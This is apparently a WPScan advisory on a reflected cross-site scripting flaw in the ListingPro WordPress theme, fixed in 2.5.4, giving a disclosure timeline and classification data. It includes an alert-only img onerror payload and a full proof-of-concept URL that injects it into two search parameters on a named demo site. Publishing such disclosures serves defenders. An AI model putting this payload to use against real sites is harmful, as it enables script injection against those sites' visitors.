ListingPro < 2.5.4 – Unauthenticated Reflected Cross-Site Scripting | Theme Vulnerabilities

Description

Reflected XSS was discovered in the «ListingPro - WordPress Directory Theme», tested version — v2.5.3

Edit - WPScanTeam:
January 13th, 2020 - Report Received & Envato Contacted
January 13th, 2020 - Envato Investigating
January 15th, 2020 - Theme updated, v2.5.4, fixing the issue

Proof of Concept

----[]- Info: -[]----
Demo website: https://classic.listingprowp.com/


----[]- Reflected XSS: -[]----
Payload Sample: "><img src=x onerror=(alert)(`m0ze`);//">

PoC: https://classic.listingprowp.com/?select=&lp_s_loc="><img src=x onerror=(alert)(`m0ze`);//">&lp_s_tag="><img src=x onerror=(alert)(`m0ze`);//">&lp_s_cat=&s=home&post_type=listing

Affects Themes

Fixed in 2.5.4

References

URL

https://themeforest.net/item/listingpro-multipurpose-directory-theme/19386460

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

m0ze

Submitter

m0ze

Submitter twitter

Verified

No

WPVDB ID

482e2b28-9902-4591-90ad-59c386fba83b

Timeline

Publicly Published

2020-01-15 (about 6 years ago)

Added

2020-01-15 (about 6 years ago)

Last Updated

2020-12-17 (about 5 years ago)

Other

Published

Title

Published

2025-03-03

Title

AFI < 1.100.0 - Admin+ Stored XSS

Published

2026-04-03

Title

Widgets for Social Photo Feed < 1.8.0 - Unauthenticated Stored Cross-Site Scripting via feed_data

Published

2025-10-20

Title

Rocket < 3.20.0.2 - Authenticated (Author+) Stored Cross-Site Scripting

Published

2024-11-27

Title

FAQ Builder AYS < 1.7.2 - Reflected Cross-Site Scripting

Published

2025-01-15

Title

Contact Form With Shortcode < 4.2.6 - Reflected Cross-Site Scripting